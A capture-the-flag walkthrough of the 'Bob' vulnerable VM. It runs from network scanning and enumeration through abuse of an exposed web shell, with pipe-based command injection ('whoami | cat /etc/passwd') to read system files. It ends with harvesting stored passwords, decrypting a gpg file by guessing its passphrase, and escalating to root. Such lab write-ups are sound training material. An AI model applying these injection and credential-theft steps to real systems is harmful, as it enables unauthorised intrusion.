CTF Machine - Bob

﷽

Machine : http://c0rruptedb1t.com/vms/Bob.ova

Duration : 3 x 60 Minutes (approximately)

Meet Bob ...

1. Preparation :

Check my own IP.

Discover neighbours IP.

fping -a -g 10.0.2.0/24

netdiscover -r 10.0.2.0/24



2. Enumeration :

nmap -sS -nvv -A -p22-10000 10.0.2.14

We got some interesting information : /dev_shell.php & /passwords.html, let's dig deeper with dirb

dirb http://10.0.2.14

next, curl it

Browse the main page http://10.0.2.14

Lets jump to  http://10.0.2.14/dev_shell.php

curl http://10.0.2.14/dev_shell.php

seems like someone already mess their server :)

shall we go with basic command checking : whoami

Only basic account www-data anyway, it's ok ... we go deeper to /etc/passwd
cat /etc/passwd

Nop ... but wait, what if we use pipe to run output for the second command ? lets try it ...
whoami | cat /etc/passwd

yess, it's a bliss .... we can identify some user from the passwd file ;
 
c0rruptedb1t : c0rruptedb1t
Bob : bob
James C : jc
Sebastian W : seb
Elliot A : elliot

let's check the home directory :

whoami | ls ../../../home/

confirmed is bob & friends ... now we check every last of their directory,  perhaps we can find some gems there, we start from bottom to top, elliot go first ...

found fishy file : theadminisdumb.txt , let's cat it ...

so far we already got the following credential information :

james : jc:Qwerty
elliot : elliot:theadminisdumb

yiihaa ... we might found some low level access, lets try it ...

ssh connection is denied, back to previous nmap result we did not find any ssh service, seems like ssh service is not active or they might already changed the ssh port.

sshd is active, but why we are unable to connect ? lets check the sshd_config

ok, no wonder we can't connect ... default port are changed from 22 to 25468

retrying ssh ...

we got low level access shell, it's good enough .... shall we left the webshell ?

3. Escalation :

Lets see what we have here ...

can we have root privilege with sudo ?

... nop ... sorry ... let's wandering arround the home directory ... isn't Bob is the Sysadmin ?

perhaps he have something that we looking for ...

got some insteresting file, also gpg'ed file ... well check it later.

let's go deeper ...

found a bash script : notes.sh , try to run it ./notes.sh

meaningless ... fallback to previous file

vi /home/bob/Documents/staff.txt

something is burning ...

trying to find root executables ...

find / -user root -perm -4000 -print 2>/dev/null

... nop ... no find , no vi, no cat to use .... to perform escalation ....

ok ... lets carefuly step back to Bob's home dir, and look for hidden file ?

cd /home/bob ; ls -alh

what inside .old_passwordfile.html ?

more .old_passwordfile.html

oooh ... ok, it's James and Sebastian password, let's try them ...

valid password, but it's just another low level shell access, do we miss something ?

login.txt.gpg ... we need to open this

back to /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh

sh /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/notes.sh

the script contain some promising keyword, let's use them to open the pgp'ed file

first ... copying gpg login.txt.gpg to elliot homedir

cd /home/elliot/

cp home/bob/Documents/login.txt.gpg .

then ... let's try to decrypt it ...

gpg -dv login.txt.gpg

trying the possible passphrase combination :

HarryPotter

harrypotter

Cucumber

cucumber

seasanty

SeaSanty

HARPOCRATES

finally ...

found another credential

bob:b0bcat_

use it ...

escalate it ...

sudo su ; whoami

looking for the flag ...

cd /root/ ; ls -alh

check root's bash history

cat .bash_history

here is the flag ...

let's find flag.txt

find / -name flag.txt -exec cat {} \;

Finish ...

Thank you and Greets ~c0rruptedb1t